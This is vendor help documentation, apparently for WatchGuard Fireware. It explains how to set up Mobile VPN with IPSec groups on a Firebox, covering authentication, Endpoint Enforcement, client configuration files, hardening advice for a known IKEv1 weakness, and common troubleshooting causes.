Configure the Firebox for Mobile VPN with IPSec

You can enable Mobile VPN with IPSec for a group of users you have already created, or you can create a new user group. The users in the group can authenticate either to the Firebox or to a third-party authentication server included in your Firebox configuration.

For more information about how to add users to a group for local Firebox authentication, see Add Users to a Firebox Mobile VPN Group. If you use a third-party authentication server, follow the instructions in the documentation from the manufacturer.

To limit mobile VPN connections to devices that follow corporate policy, you can use Endpoint Enforcement. Before you enable Endpoint Enforcement for Mobile VPN with IPSec groups in the Authentication > Servers configuration, enable and configure Endpoint Enforcement at Subscription Settings > Endpoint Enforcement (Fireware v12.9 or higher). In Fireware v12.5.4 to v12.8.x, enable and configure this feature at Subscription Settings > TDR Host Sensor Enforcement.

For more information about Endpoint Enforcement, see About Network Access Enforcement with the TDR Host Sensor.

For information about how to enable Endpoint Enforcement for IPSec groups, see Add Users to a Firebox Mobile VPN Group.

The IKEv1 Aggressive Mode vulnerability described in CVE-2002-1623 affects Mobile VPN with IPSec. We recommend that you configure a certificate instead of a pre-shared key if you have a WSM Management Server. If you do not have a Management Server, we recommend that you specify a strong pre-shared key and change it on a regular basis. We also recommend that you specify a strong hashing algorithm such as SHA-256.

Configure a Mobile VPN with IPSec Group

To configure Mobile VPN with IPSec for a group of users, you add a Mobile VPN with IPSec group configuration.

When you add a Mobile VPN with IPSec group, a Mobile VPN with IPSec Any policy is automatically created to allow all traffic from users in the group to the resources available through the tunnel. For more information about Mobile VPN with IPSec policies, see Configure Policies to Filter IPSec Mobile VPN Traffic.

Users that are members of the group you create are not able to connect until they import the correct configuration file in their WatchGuard IPSec Mobile VPN Client software. You must generate the configuration file and then provide it to the end users. For more information, see Generate Mobile VPN with IPSec Configuration Files

Troubleshoot Mobile VPN with IPSec

If users cannot connect to the VPN or to network resources, check for these common causes:

  • Incorrect DNS settings
  • Disabled or deleted policies
  • Incorrect user group settings
  • IP address pool overlap
  • Incorrect route settings

For more troubleshooting information, see Troubleshoot Mobile VPN with IPSec.

See Also

Generate Mobile VPN with IPSec Configuration Files

Configure Windows Server 2016 or 2012 R2 to authenticate mobile VPN users with RADIUS and Active Directory in the WatchGuard Knowledge Base